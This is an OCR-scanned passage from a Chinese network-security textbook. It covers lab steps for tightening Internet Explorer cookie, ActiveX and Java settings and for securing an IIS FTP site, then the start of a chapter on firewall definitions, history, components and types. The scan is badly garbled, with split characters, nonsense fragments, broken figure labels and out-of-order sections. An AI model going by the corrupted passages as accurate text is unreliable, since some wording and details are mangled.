@ 在 弹出 的 “隐私 ”对 话 框 中 , 单 击 “高 级 ”按钮 ,出 现 Cookies 设置 选项 ,如 图 6-16 所 
示 , 有 两 个 Cookies 选项 ,将 其 阻止 即 可 。 
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图 6-15 “安全 ?选项 卡 图 6-16 Cookies 安全 设置 


(2) 限制 ActiveX 的 使 用 。 

Q EFIE NE. 

@ ARTH” "Internet 选项 "命令 ,在 打 
开 的 对 话 框 中 ,选择 “安全 ”选项 卡 。 ies 


19. ActiveX 控件 和 插件 


© 单 击 选项 卡 中 的 Internet 图 标 ( 地 球 标 "oxi 


志 ) ,如 图 6-15 MR ,代表 要 设置 整个 IE 的 安全 OE mer 
设置 © Bm 
. * 


ORT , 
@ 单 击 选项 卡 下 方 的 “ 自 定义 级 别 " 按 钮 ， | | 000 o 


出 现 “ 安 全 设置 "对 话 框 。 
© 移动 对 话 框 中 的 垂直 滚动 滑 块 ,直到 出 


4 a 
现 “ActiveX 控件 和 插件 ”设置 选项 ,如 图 6-17 所 | ERES mine Balore ZREN 


重 置 自 定义 设置 


示 。 按 6. 2.2 节 的 相关 内 容 设 置 该 项 即 可 。 重要 为 加 [中 高 Bi) 


(3) 设置 Java 的 安全 性 。 


(D 打开 下 浏览 器 ,选择 “工具 ”一 ”Internet 


选项 命令。 图 6-17 ActiveX 设置 选项 


@ 在 所 打开 的 对 话 框 中 ,选择 “安全 "选项 卡 。 


© 单 击 选项 卡 中 的 Internet 图 标 (地 球 标志 ) ,代表 要 设置 整个 IE 的 安全 选项 


JA. 


@ 单 击 选项 卡 下 方 的 “ 自 定义 级 别 " 按 钮 ,打开 “安全 设置 "对 话 框 。 


C) 移动 对 话 框 的 垂直 滚动 滑 块 , 直 到 出 现 *Java 权限 ?设置 选项 , 见 图 6-8, 可 以 看 到 一 


共和 包含 多 个 Java 的 安全 设置 。 


* Java 权限 ,是 Java 程序 对 本 地 计算 机 操作 的 权限 , 共 分 为 高"“ 中 ”“ 低 


” “禁用 ” 


4 级 。IE 默认 设置 是 “中 ”级 ,用 户 可 以 将 它 设 为 “高 "。“ 自 定义 ”设置 是 上 


X Java 的 各 个 操作 的 权限 ,这 是 给 高 级 用 户 使 用 的 ,一 般 用 户 可 以 不 使 用 。 


户 自己 定 
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™ 
。 Java 小 程序 脚本 ,是 对 Java Applet 程序 设置 的 。 许 多 网 站 上 都 使 用 Java Applet 作 
为 与 用 户 交互 的 脚本 语言 ,所 以 IE 的 默认 设置 为 “启用 ”选项 。 将 它 设 为 “禁用 ” 选 
项 ,将 会 失去 许多 网 站 的 功能 支持 ,用 户 可 以 自己 考虑 。 
。 活动 脚本 , 指 是 否 允 许 浏览 器 使 用 JavaScript 语言 进行 网 页 的 显示 。 同 样 许多 网 站 
上 都 使 用 Java 作为 与 用 户 交互 的 脚本 语言 ,所 以 IE 对 它 的 默认 设置 为 “启用 ” 选 
项 。 如 果 用 户 是 在 聊天 室 ,就 可 以 将 这 个 功能 设 为 “禁止 ?选项 ,以 防止 前 面 讲述 的 
各 种 攻击 。 
。 允许 状态 栏 通过 脚本 更 新 ,这 个 功能 具有 一 定 的 危险 性 ,但 是 它 在 E-mail ,表单 的 操 
作 和 信息 的 提交 中 都 发 挥 着 重要 的 作用 。 用 户 在 不 需要 时 ,可 以 关闭 这 个 功能 。 


Gyi 6.2 FTP 服务 安全 


【 实 训 目的 】 

掌握 IIS-FTP 服务 的 安全 设置 。 

【 实 训 环 境 】 

装 有 Windows Server 2003 操作 系统 并 开通 FTP 服务 。 

【 实 训 内 容 】 

熟悉 FTP 服务 安全 的 设置 方法 。 

CD 可 设置 是 否 允 许 匿名 方式 访问 。 在 如 图 6-18 所 示 的 “安全 账号 ?选项 卡 中 , 若 不 选 
中 “只 允许 匿名 连接 ” 复 选 框 , 则 要 求 只 有 已 注册 的 用 户 提 供 正 确 的 用 户 名 和 密码 后 才 可 访 
问 。 若 选中 “只 允许 匿名 连接 " 复 选 框 , 则 所 有 用 户 均 可 访问 。 


BU FTP 站 点 属性 
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图 6-18 安全 账号 设置 选项 


(2) 可 以 允许 或 拒绝 指定 IP 地 址 的 主机 的 访问 。 使 用 “目录 安全 性 ”选项 卡 能 够 设置 访 
问 限 制 ,添加 地 址 授予 访问 或 拒绝 访问 站 点 的 权限 ,设置 只 允许 192. 168. 1. 12/255. 255. 255. 0 
网 络 中 的 主机 可 访问 FTP 服务 器 ,如 图 6-19 所 示 。 


6-19 目录 安全 设置 选项 


(3) FTP 用 户 仅 有 两 种 目录 权限 : 读 取 和 写 人 。 读 取 权 限 对 应 于 下 载 , 写 人 权限 对 应 
于 上 传 。FTP 站 点 的 目录 权限 是 对 全 体 访问 该 目录 的 用 户 都 生效 的 权限 , 即 一 旦 某 个 目录 
P 用 户 , 包 括 授权 用 户 都 不 能 进行 上 传 操 作 。 图 6-20 为 


设置 为 仅 有 读 取 权限 , 则 任何 FT 


FTP 站 点 主 目录 设置 权限 为 读 取 和 日 志 访问 。 
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防火 墙 技术 | 


在 计算 机 网 络 中 ,防火 墙 所 起 的 作用 类 似 于 门卫 ,是 网 络 安全 第 一 道 防线 , 它 将 内 部 网 
和 Internet 隔离 ,在 两 个 网 络 通信 时 执行 访问 控制 策略 。 本 章 介绍 防火 墙 技术 的 基本 原理 、 
防火 墙 的 体系 结构 .防火 墙 的 主要 技术 指标 、 防 火 墙 的 缺陷 防火墙 的 部 署 等 。 


6.1 防火 墙 概述 


防火 墙 是 目前 最 重要 的 一 种 网 络 防护 设备 ,从 专业 角度 讲 ,防火 墙 是 位 于 两 个 (或 多 个 ) 
网 络 之 间 , 实 施 网 络 之 间 访问 控制 的 一 组 组 件 集合 。 


7.1.1 防火 墙 的 定义 


通常 所 说 的 防火 墙 是 隔离 本 地 网 络 与 外 界 网 络 边界 的 一 道 防御 系统 。 它 可 以 使 企业 内 
部 局 域 网 (LAN) 与 Internet 之 间或 者 与 其 他 外 部 网 络 互相 隔离 ,限制 网 络 互 访 来 保护 内 部 
网 络 。 

防火 墙 是 一 个 由 软件 和 硬件 设备 组 合 而 成 、 在 内 部 网 络 和 外 部 网 络 之 间或 专用 网 络 与 
公共 网 络 之 间 构造 的 保护 屏障 ,使 得 内 部 网 络 与 外 部 网 络 之 间 的 所 有 网 络 通信 都 要 经 过 防 
火 墙 ,从 而 保护 内 部 网 免 受 外 部 非法 用 户 的 侵入 。 

典型 的 防火 墙 具 有 以 下 三 个 方面 的 基本 特性 。 

(1) 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数据 流 都 必须 经 过 防火 墙 。 这 是 防火 墙 所 处 
网 络 位 置 特 性 ,同时 也 是 一 个 前 提 。 因 为 只 有 当 防 火 墙 是 内 、 外 部 网 络 之 间 通 信 的 唯一 通 
道 , 才 可 以 全 面 \ 有 效 地 保护 内 部 网 络 不 受 侵害 。 

(2) 只 有 符合 安全 策略 的 数据 流 才能 通过 防火 墙 。 防 火 墙 最 基本 的 功能 是 确保 网 络 流 
量 的 合法 性 ,并 在 此 前 提 下 将 网 络 的 流量 快速 地 从 一 条 链 路 转发 到 另外 的 链 路 上 去 。 从 最 
时 的 防火 墙 模型 开始 谈 起 ,原始 的 防火 墙 是 一 台 * 双 穴 主 机 ”, 即 具备 两 个 网 络 接口 ,同时 拥 
有 两 个 网 络 层 地址 。 防 火 墙 将 网 络 上 的 流量 通过 相应 的 网 络 接口 接收 上 来 ,按照 OSI 协议 
栈 的 七 层 结构 顺序 上 传 ,在 适当 的 协议 层 进行 访问 规则 和 安全 审查 ,然后 将 符合 通过 条 件 的 
报 文 从 相应 的 网 络 接口 送出 ,而 对 于 那些 不 符合 通过 条 件 的 报 文 则 子 以 阻 断 。 因 此 ,从 这 个 
角度 上 来 说 ,防火 墙 是 一 个 类 似 于 路 由 器 的 多 端口 的 (网 络 接口 之 2) 转 发 设备 , 它 跨 接 于 
多 个 分 离 的 物理 网 段 之 间 , 并 在 报 文 转 发 过 程 之 中 完成 对 报 文 的 审查 工作 ,如 图 7-1 
所 示 。 
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图 7-1 防火 墙 的 报 文 审查 功能 


(3) 防火 墙 自身 应 具有 非常 强 的 抗 攻 击 免疫 力 。 这 是 防火 墙 之 所 以 能 担当 企业 内 部 网 
络 安全 防护 重任 的 先决 条 件 。 防 火 墙 处 于 网 络 边缘 , 它 就 像 一 个 边界 卫士 一 样 , 如 图 7-2 所 
示 , 时 刻 都 要 面 对 黑客 的 入侵 ,这 样 就 要 求 防火 墙 自 身 要 具有 非常 强 的 抗 攻 击 入 侵 本 领 。 具 
体 来 说 ,首先 要 求 防火 墙 操作 系统 具有 完整 的 信任 关系 ; 其 次 防火 墙 自身 具有 非常 低 的 服 
务 功 能 ,除了 专门 的 防火 墙 嵌 入 系统 外 ,再 没有 其 他 应 用 程序 在 防火 墙 上 和 运行。 当然, 这些 
安全 性 也 只 能 说 是 相对 的 。 
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图 7-2 ”防火墙 处 于 网 络 边缘 


7.1.2 防火墙 的 发 展 


第 一 代 防 火 墙 技术 几乎 与 路 由 器 同时 出 现 ,采用 了 包 过 滤 (packet filter) 技 术 ; 1989 
年 ,贝尔 实验 室 的 Dave Presotto 和 Howard Trickey 推出 了 第 二 代 防 火 墙 , 即 电路 层 防火 
墙 ,同时 提出 了 第 三 代 防 火 墙 一 一 应 用 层 防 火 墙 (代理 防火 墙 ) 的 初步 结构 ; 1992 年 ,USC 
信息 科学 院 的 Bob Braden 开发 出 了 基于 动态 包 过 滤 (dynamic packet filter) 技 术 的 第 四 代 
防火 墙 ,后 来 演变 为 目前 所 说 的 状态 监视 (stateful inspection) 技 术 ; 1998 年 ,NAI 公司 推出 
了 一 种 自 适应 代理 (adaptive proxy) 技 术 , 并 在 其 产品 Gauntlet Firewall for NT 中 得 以 实 
现 , 给 代理 类 型 的 防火 墙 赋 予 了 全 新 的 意义 ,可 以 称 之 为 第 五 代 防火 墙 。 


第 7 章 防火 墙 技术 


由 于 传统 的 防火 墙 对 于 应 用 层 的 攻击 无 法 进行 有 效 的 抵抗 ,下 一 代 应 用 防火 墙 
(NGAF) 提 供 了 以 传统 基础 网 络 安 全 ,应 用 识别 与 控制 ,应 用 威胁 防护 为 核心 的 多 种 安全 功 
能 ,不 但 可 以 理解 应 用 是 什么 .能 够 识别 网 络 层 和 特征 码 之 类 的 攻击 ,而 且 还 能 识别 未 知 的 
攻击 。 
7.1.3 防火 墙 的 组 成 
防火 墙 主要 由 安全 规则 、 身 份 认证 工具 、 包 过 滤 和 应 用 网 关 4 个 部 分 组 成 。 


1. 安全 规则 


防火 墙 的 基本 原理 是 对 内 部 网 络 与 外 部 网 络 之 间 的 信息 流 进行 控制 ,这 种 控制 功能 是 
通过 在 防火 墙 中 预先 设 定 的 安全 规则 (也 称 为 安全 策略 ) 实 现 的 。 防 火 墙 的 安全 规则 由 匹配 
条 件 和 处 理 方式 两 个 部 分 构成 ,其 中 匹配 条 件 是 一 些 逻 辑 表 达 式 ,根据 数据 包 中 的 特定 值 域 
可 以 计算 出 逻辑 表达 式 的 值 ,如 果 逻 辑 表 达 式 的 值 为 真 , 则 说 明 该 信息 与 当前 的 安全 规则 相 
匹配 ,信息 一 旦 与 安全 规则 相 匹 配 , 就 必须 采用 安全 规则 中 的 处 理 方 式 进行 处 理 。 

一 般 来 说 ,大 多 数 防火 墙 的 安全 规则 的 处 理 方式 包括 以 下 几 种 。 

。 Accept: 允许 数据 包 或 信息 通过 。 

。 Reject: 拒绝 数据 包 或 信息 通过 ,并 且 通 知 信息 源 该 信息 被 禁止 。 

* Drop; 直接 将 数据 包 或 信息 丢弃 ,并 且 不 通知 信息 源 。 

通常 ,所 有 的 防火 墙 产 品 在 设计 时 有 两 个 基本 策略 。 其 一 ,一 切 未 被 允许 的 就 是 禁止 
的 , 即 只 允许 通过 在 系统 中 已 经 认可 的 合法 的 服务 ,而 拒绝 其 他 所 有 的 未 做 规定 的 服务 ; 其 
二 ,一 切 未 被 禁止 的 就 是 允许 的 , 即 只 拒绝 在 系统 中 明确 不 允许 的 服务 ,而 允许 其 他 所 有 未 
做 规定 的 服务 。 很 明显 ,前 一 种 策略 会 具有 很 高 的 安全 性 ,但 同时 也 限制 了 用 户 所 使 用 的 服 
务 种 类 ,缺乏 使 用 方便 性 。 后 一 种 策略 使 用 较为 方便 ,规则 配置 较为 灵活 ,但 是 缺乏 安全 性 。 


2. 身份 认证 工具 


防火 墙 必须 使 用 安全 的 身份 认证 ,才能 避免 非 授权 用 户 侵入 内 部 系统 。 由 于 防火 墙 可 
以 集中 并 控制 网 点 的 访问 ,所 以 将 先进 的 认证 软件 或 硬件 安装 在 防火 墙 中 是 一 个 不 错 的 选 
择 , 这 种 将 各 种 认证 措施 集中 到 防火 墙 的 做 法 更 切合 实际 ,也 更 便于 管理 。 


3. 包 过 滤 


IP 数据 包 过 滤 一 般 由 包 过 滤 路 由 器 来 实现 , 包 过 滤 路 由 器 可 以 决定 对 它 所 收 到 的 每 个 
数据 包 的 取舍 ,路 由 器 对 每 个 发 送 或 接收 来 的 数据 包 审查 是 否 与 某 个 包 过 滤 规 则 相 匹配 ,如 
果 找 到 一 个 匹配 , 且 规则 允许 该 数据 包 通过 , 则 该 数据 包 根据 路 由 表 中 的 信息 向 前 转发 。 如 
果 找 到 一 个 与 规则 不 匹配 的 , 且 规则 拒绝 此 数据 包 , 则 该 数据 包 将 被 舍弃 。 


4. 应 用 网 关 


应 用 网 关 ( 也 称 为 代理 服务 器 ) 上 安装 有 特殊 用 途 的 特别 应 用 程序 ,被 称 为 “代理 服务 ” 
或 “代理 服务 器 程序 ”。 使 用 代理 服务 后 ,内 部 网 络 用户 与 外 部 网 络 资源 之 间 不 建立 直接 的 
网 络 连 接 或 直接 的 网 络 通信 ,所 有 的 信息 交互 必须 借助 于 代理 服务 器 的 应 用 层 信息 中 继 功 
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能 。 因 此 ,内 部 网 络 用 户 实际 上 是 与 应 用 层 代 理 之 间 建 立 应 用 层 连接 ,而 应 用 层 代理 与 外 部 
网 络 资源 之 间 建 立 应 用 层 连 接 。 


7.1.4 防火墙 的 基本 功能 
1. 防火 墙 的 访问 控制 功能 


访问 控制 功能 是 防火 墙 设备 最 基本 的 功能 ,其 作用 就 是 对 经 过 防火 墙 的 所 有 通信 进行 
连通 或 阻 断 的 安全 控制 ,以 实现 连接 到 防火 墙 上 的 各 个 网 段 的 边界 安全 性 。 为 实施 访问 控 
制 ,可 以 根据 据 网 络 地 址 、 网 络 协议 以 及 TCP、UDP 端口 进行 过 滤 ; 可 以 实施 简单 的 内 容 过 
滤 , 如 电子 邮件 附件 的 文件 类 型 等 ; 可 以 将 TP 55 MAC 地 址 绑 定 以 防止 次 用 IP 的 现象 发 
生 ; 可 以 对 上 网 时 间 段 进行 控制 ,不 同时 段 执行 不 同 的 安全 策略 ; 可 以 对 VPN 通信 的 安全 
进行 控制 ; 可 以 有 效 地 对 用 户 进行 带宽 流量 控制 。 

防火 墙 的 访问 控制 采用 两 种 基本 策略 :“ 黑 名 单 策 略 和 * 白 名 单 策 略 。“ 黑 名 单 "策略 
指 除 了 规则 禁止 的 访问 ,其 他 都 是 允许 的 。“ 白 名 单 策 略 指 除 了 规则 允许 的 访问 ,其 他 都 是 
禁止 的 。 


2. 防火 墙 的 防止 外 部 攻击 


防火 墙 的 内 置 黑客 人 侵 检测 与 防范 机 制 可 以 通过 检查 TCP 连接 中 的 数据 包 的 序号 来 
保护 网 络 免 受 数据 包 注 入 、SYN Flooding Attack( 同 步 洪 泛 ) .DoS( 拒 绝 服务 ) 和 端口 扫描 
等 黑客 攻击 。 针 对 黑客 攻击 手段 的 不 断 变化 ,防火 墙 软件 也 能 像 杀 毒 软件 一 样 动态 升级 ,以 
适应 新 的 变化 。 


3. 防火 墙 的 地 址 转换 


防火 墙 拥有 灵活 的 地 址 转换 (network address transfer,NAT) 能 力 ,同时 支持 正 向 、 反 
向 地 址 转换 。 正 向 地 址 转换 用 于 使 用 保留 IP 地 址 的 内 部 网 用 户 通过 防火 墙 访问 公众 网 中 
的 地 址 时 对 源 地 址 进行 转换 ,能 有 效 地 隐藏 内 部 网 络 的 拓扑 结构 等 信息 。 同 时 内 部 网 用 户 
共享 使 用 这 些 转换 地 址 ,使 用 保留 TP 地 址 就 可 以 正常 访问 公众 网 ,有 效 地 解决 了 全 局 IP 地 
址 不 足 的 问题 。 

内 部 网 用 户 对 公众 网 提供 访问 服务 (如 Web, E-mail 服务 等 ) 的 服务 器 如 果 保 留 IP. 地 
址 ,或 者 想 隐 藏 服务 器 的 真实 IP 地 址 ,都 可 以 使 用 反 向 地 址 转换 来 对 目的 地 址 进行 转换 。 
公众 网 访问 防火 墙 的 反 向 转换 地 址 ,由 内 部 网 使 用 保留 IP 地 址 的 服务 器 提供 服务 ,同样 既 
可 以 解决 全 局 IP 地 址 不 足 的 问题 ,又 能 有 效 地 隐藏 内 部 服务 器 信息 ,对 服务 器 进行 保护 。 


4. 防火 墙 的 日 志 与 报警 


防火 墙 具 有 实时 在 线 监视 内 外 网 络 间 TCP 连接 的 各 种 状态 以 及 UDP 协议 包 能 力 ,用 
户 可 以 随时 掌握 网 络 中 发 生 的 各 种 情况 。 在 日 志 中 记录 所 有 对 防火 墙 的 配置 操作 、 上 网 通 
信 时 间 、 源 地 址 .目的 地 址 、 源 端口 .目的 端口 . 字 节 数 , 是 否 允 许 通 过 。 这 些 日 志 信息 可 以 用 
来 进行 安全 性 分 析 。 针 对 FTP, 记 录 读 、 写 文件 的 动作 。 新 型 防火 墙 可 以 根据 用 户 的 不 同 
需要 对 不 同 的 访问 策略 做 不 同 的 日 志 , 例 如 有 一 条 访问 策略 允许 外 部 用 户 读 取 FTP 服务 器 
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上 的 文件 ,从 日 志 信息 用 户 就 可 以 知道 到 底 哪 些 文件 被 读 取 了 。 在 线 监 视 和 日 志 信息 还 能 
实时 监视 和 记录 异常 的 连接 、 拒 绝 的 连接 、 可 能 的 入 侵 等 。 
5. 防火 墙 的 身份 认证 


防火 墙 支持 基于 用 户 身份 的 网 络 访问 控制 ,不 仅 具 有 内 置 的 用 户 管理 及 认证 接口 ,同时 
也 支持 用 户 进行 外 部 身份 认证 。 防 火 墙 可 以 根据 用 户 认 证 的 情况 动态 地 调整 安全 策略 , 实 
现 用 户 对 网 络 的 授权 访问 。 


(3 防火 墙 技术 概述 


从 防火 墙 的 软 、 硬 件 形式 ,技术 ,结构 ,部署 的 位 置 以 及 性 能 等 不 同 的 角度 ,防火 墙 可 以 
有 不 同 分 类 方法 ,以 下 是 防火 墙 的 主要 的 分 类 形式 。 


7.2.1 按 软 .硬件 形式 分 类 


按 防火 墙 的 软 、 硬 件 形式 来 分 ,防火 墙 可 以 分 为 软件 防火 墙 和 硬件 防火 墙 以 及 芯片 级 防 
火 墙 三 种 类 别 。 

1. 软件 防火 墙 

软件 防火 墙 运行 于 特定 的 计算 机 上 , 它 需 要 用 户 预 先 安装 好 的 计算 机 操作 系统 的 支持 ， 
一 般 来 说 这 台 计 算 机 就 是 整个 网 络 的 网 关 , 俗 称 “ 个 人 防火 墙 "。 软 件 防 火 墙 需要 先 在 计算 


机 上 安装 并 做 好 配置 才 可 以 使 用 。 防 火 墙 厂商 中 做 网 络 版 软件 防火 墙 最 出 名 的 莫 过 于 
Checkpoint。 使 用 这 类 防火 墙 ,需要 网 管 对 所 工作 的 操作 系统 平台 比较 熟悉 。 


2. 硬件 防火 墙 


这 里 说 的 硬件 防火 墙 是 指 “ 所 谓 的 硬件 防火 墙 "。 之 所 以 加 上 “所 谓 ” 二 字 , 是 针对 芯片 
级 防火 墙 说 的 。 它 们 最 大 的 差别 在 于 是 否 基于 专用 的 硬件 平台 。 目 前 市 场 上 大 多 数 防火 墙 
都 是 这 种 所 谓 的 硬件 防火 墙 ,它们 都 基于 PC 架构 ,也 就 是 说 ,它们 和 普通 的 家 庭 用 的 PC 没 
有 太 大 区 别 。 在 这 些 PC 架构 计算 机 上 运行 一 些 经 过 裁剪 和 简化 的 操作 系统 ,最 常用 的 有 
老 版 本 的 UNIX, Linux 和 FreeBSD 系统 。 值 得 注意 的 是 ,由 于 此 类 防火 墙 采用 的 依然 是 别 
人 的 内 核 ,因此 依然 会 受到 操作 系统 本 身 的 安全 性 影 

传统 硬件 防火 墙 一 般 至 少 应 具备 三 个 端口 ,分 别 接 内 网 、 外 网 和 DMZ 区 (中 立 区 ), 现 
在 一 些 新 的 硬件 防火 墙 往往 扩展 了 端口 ,常见 四 端口 防火 墙 一 般 将 第 四 个 端口 作为 配置 口 、 
管理 端口 。 很 多 防火 墙 还 可 以 进一步 扩展 端口 数目 。 


. 芯片 级 防火 墙 


芯片 级 防火 墙 基 于 专门 的 硬件 平台 ,没有 操作 系统 。 专 有 的 ASIC 芯片 促使 它们 比 其 
他 种 类 的 防火 墙 速 度 更 快 ,处 理 能 力 更 强 , 性 能 更 高 。 做 这 类 防火 墙 比 较 出 名 的 厂商 有 
NetScreen,FortiNet , Cisco 等 。 这 类 防火 墙 由 于 是 专用 操作 系统 ,因此 防火 墙 本 身 的 漏 
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洞 比较 少 , 不 过 价格 相对 比较 高 品 。 
7.2.2 按 防火 墙 的 实现 技术 分 类 


防火 墙 技术 虽然 有 许多 种 ,但 总 体 来 讲 可 分 为 * 包 过 滤 型 ?和 ”应 用 代理 型 ?两 大 类 。 前 
者 以 以 色 列 的 Checkpoint 防火 墙 和 美国 Cisco 公司 的 PIX 防火 墙 为 代表 ,后 者 以 美国 NAI 
公司 的 Gauntlet 防火 墙 为 代表 。 


1. 包 过 滤 型 


包 过 滤 (packet filtering) 型 防火 墙 工作 在 OSI 网 络 参 考 模型 的 网 络 层 和 传输 层 , 它 根 
据 数据 包头 源 地 址 .目的 地 址 .端口 号 和 协议 类 型 等 标志 确定 是 否 允 许 通 过 。 只 有 满足 过 滤 
条 件 的 数据 包 才 被 转发 到 相应 的 目的 地 ,其 余数 据 包 则 被 从 数据 流 中 丢弃 ,如 图 7-3 所 示 。 
上 行 


( 包 过 滤 ) 
图 7-3 包 过 滤 型 防火 墙 工作 原理 


包 过 滤 方 式 是 一 种 通用 、 廉 价 和 有 效 的 安全 手段 。 之 所 以 通用 ,是 因为 它 不 是 针对 各 个 
有 具体 的 网 络 服务 采取 特殊 的 处 理 方 式 ,适用 于 所 有 网 络 服务 ; 之 所 以 廉价 ,是 因为 大 多 数 路 
由 器 都 提供 数据 包 过 滤 功 能 ,所 以 这 类 防火 墙 多 数 是 由 路 由 器 集成 的 ; 之 所 以 有 效 ,是 因为 
它 能 很 大 程度 上 满足 绝 大 多 数 企业 的 安全 要 求 。 

在 整个 防火 墙 技术 的 发 展 过 程 中 , 包 过 滤 技 术 出 现 了 两 种 不 同 版 本 , 称 为 “第 一 代 静 态 
包 过 滤 ” 和 "第 二 代 动 态 包 过 滤 ” 即 状态 检测 型 防火 墙 。 

第 一 代 静 态 包 过 滤 类 型 防火 墙 ( 图 7-4) 是 根据 定义 好 的 过 滤 规 则 审查 每 个 数据 包 , 以 
便 确定 其 是 否 与 某 一 条 包 过 滤 规 则 匹配 。 过 滤 规 则 基于 数据 包 的 报头 信息 进行 制定 。 报 头 
信息 中 包括 IP 源 地 址 、IP 目标 地 址 、 传 输 协议 (TCP、.UDP ICMP 4), TCP/UDP 目标 端 
O ICMP 消息 类 型 等 。 


应 用 层 应 用 层 应 用 层 

表示 层 表示 层 表示 层 

会 话 层 会 话 层 会 话 层 

传输 层 传输 层 传输 层 

网 络 层 网 络 层 网 络 层 > 
数据 链 路 层 数据 链 路 层 数据 链 路 层 

物理 层 物理 层 物理 层 
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包 过 滤 方 式 的 优点 是 不 用 改动 客户 机 和 主机 上 的 应 用 程序 ,因为 它 工作 在 网 络 层 和 传 
输 层 ,与 应 用 层 无 关 。 其 弱点 明显 ,表现 在 以 下 几 个 方面 : 过 滤 判 别 的 依据 只 是 网 络 层 和 传 
输 层 的 有 限 信息 ,因而 各 种 安全 要 求 不 能 得 到 充分 满足 ; 在 许多 过 滤器 中 ,过 滤 规 则 的 数目 
是 有 限 的 , 且 随 着 规则 数目 的 增加 ,性 能 会 受到 很 大 影响 ; 由 于 缺少 上 下 文 关联 信息 ,不 能 
有 效 地 过 滤 如 UDP, RPC 一 类 的 协议 ; 大 多 数 过 滤器 中 缺少 审计 和 报警 机 制 , 它 只 能 依据 
包头 信息 ,不 能 对 用 户 身份 进行 验证 ,很 容易 受到 “地 址 欺骗 型 "攻击 ; 对 安全 管理 人 员 素质 
要 求 高 ,建立 安全 规则 时 ,必须 对 协议 本 身 及 其 在 不 同 应 用 程序 中 的 作用 有 较 深入 的 理解 。 
因此 ,过 滤器 通常 是 和 应 用 网 关 配合 使 用 ,共同 组 成 防火 墙 系统 。 


2. 应 用 代理 型 


应 用 代理 (application proxy) 型 防火 墙 工作 在 OSI 的 最 高 层 , 即 应 用 层 。 其 特点 是 完全 
“阻隔 "了 网 络 通信 流 ,通过 对 每 种 应 用 服务 编制 专门 的 代理 程序 ,实现 监视 和 控制 应 用 层 通 
信 流 的 作用 。 其 典型 网 络 结构 如 图 7-5 所 示 。 


真实 的 客户 端 


图 7-5 应 用 代理 型 防火 墙 典型 网 络 结构 


在 代理 型 防火 墙 技术 的 发 展 过 程 中 , 它 也 经 历 了 两 个 不 同 的 版 本 ,分 别 为 “第 一 代 应 用 
网 关 型 代理 防火 墙 " 和 * 第 二 代 自 适应 代理 防火 墙 ”。 

(1) 第 一 代 应 用 网 关 (application gateway) 型 代理 防火 墙 ,是 通过 一 种 代理 (proxy) 技 
术 参 与 到 一 个 TCP 连接 的 全 过 程 。 从 内 部 发 出 的 数据 包 经 过 这 样 的 防火 墙 处 理 后 ,就 好 像 
是 源 于 防火 墙 外 部 网 卡 一 样 ,可 以 起 到 隐藏 内 部 网 结构 的 作用 。 这 种 类 型 的 防火 墙 被 网 络 
安全 专家 和 媒体 公认 为 是 最 安全 的 防火 墙 , 它 的 核心 技术 是 代理 服务 器 技术 。 其 典型 网 络 
结构 如 图 7-6 所 示 。 

(2) 第 二 代 自 适应 代理 (adaptive proxy) 防 火 墙 ,是 近 几 年 才 得 到 广泛 应 用 的 一 种 新 防 
火 墙 类 型 。 它 可 以 结合 代理 类 型 防火 墙 的 安全 性 和 包 过 滤 防 火 墙 的 高 速度 等 优点 ,在 写 不 
损失 安全 性 的 基础 上 将 代理 型 防火 墙 的 性 能 提高 10 倍 以 上 。 组 成 这 种 类 型 防火 墙 的 基本 
要 素 为 自 适应 代理 服务 器 (adaptive proxy server) 与 动态 包 过 滤器 (dynamic packet filter)。 
其 典型 网 络 结构 如 图 7-7 所 示 。 
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图 7-6 应 用 网 关 型 代理 防火 墙 
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在 “ 自 适应 代理 服务 器 ”与 “动态 包 过 滤器 "之 间 存在 一 个 控制 通道 。 在 对 防火 墙 进行 配 
置 时 ,用 户 仅仅 将 所 需要 的 服务 类 型 安全 级 别 等 信息 通过 相应 Proxy 的 管理 界面 进行 设置 
就 可 以 了 。 然 后 , 自 适 应 代理 就 可 以 根据 用 户 的 配置 信息 ,决定 是 使 用 代理 服务 从 应 用 层 代 
理 请 求 还 是 从 网 络 层 转发 包 。 如 果 是 后 者 , 它 将 动态 地 通知 包 过 滤器 增 减 过 滤 规 则 ,满足 用 
户 对 速度 和 安全 性 的 双重 要 求 。 

代理 类 型 防火 墙 的 最 突出 的 优点 就 是 安全 。 由 于 它 工作 在 最 高 层 ,所 以 它 可 以 对 网 络 
中 任何 一 层 数据 通信 进行 第 选 保 护 ,不 像 包 过 滤 那 样 ,只 是 对 网 络 层 的 数据 进行 过 滤 。 
另外 ,代理 防火 墙 采取 某 种 代理 机 制 , 它 可 以 为 每 一 种 应 用 服务 建立 一 个 专门 的 代理 ， 
所 以 内 、 外 部 网 络 之 间 的 通信 不 是 直接 的 ,而 需要 先 经 过 代理 服务 器 审核 ,通过 后 再 由 代理 
KI 器 代为 连接 ,根本 没有 给 内 、 外 部 网 络 计 算 机 任何 直接 会 话 的 机 会 ,从 而 避免 了 入 侵 者 
使 用 数据 驱动 类 型 的 攻击 方式 人 侵 内 部 网 。 

代理 防火 墙 的 最 大 缺点 就 是 速度 相对 比较 慢 , 当 用 户 对 内 外 部 网 络 网 关 的 吞吐 量 要 求 
比较 高 时 ,代理 防火 墙 就 会 成 为 内 外 部 网 络 之 间 的 瓶颈 。 这 是 因为 防火 墙 需要 为 不 同 的 网 
络 服务 建立 专门 的 代理 服务 ,在 其 代理 程序 为 内 、 外 部 网 络 用 户 建立 连接 时 需要 时 间 , 所 以 
给 系统 性 能 带 来 了 一 些 负面 影响 ,但 通常 不 会 很 明显 。 


3. 状态 检测 技术 


状态 检测 防火 墙 在 网 络 层 由 一 个 检测 模块 截获 数据 包 ,抽取 与 应 用 层 状态 有 关 的 信息 ， 
并 以 此 作为 依据 决定 对 该 连接 是 接受 还 是 拒绝 。 检 测 模块 维护 一 个 动态 的 状态 信息 表 , 并 
对 后 续 的 数据 包 进行 检查 。 一 旦 发 现任 何 连接 的 参数 有 意外 的 变化 ,该 连接 就 被 中 止 。 这 
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种 技术 提供 了 高 度 安全 的 解决 方案 ,同时 也 具有 较 好 的 适应 性 和 可 扩展 性 。 状 态 检测 防火 
墙 克服 了 包 过 滤 防 火 墙 和 应 用 代理 服务 器 的 局 限 性 ,不 要 求 每 个 被 访问 的 应 用 都 有 代理 。 
状态 检测 模块 能 够 理解 并 学 习 各 种 协议 和 应 用 ,以 支持 各 种 最 新 的 应 用 服务 。 状 态 检测 模 
块 截获 ,分 析 并 处 理 所 有 试图 通过 防火 墙 的 数据 包 ,保证 网 络 的 高 度 安全 和 数据 完整 。 网 络 
和 各 种 应 用 的 通信 状态 动态 存储 、 更 新 到 动态 状态 表 中 ,结合 预定 义 的 规则 ,实现 安全 策略 。 
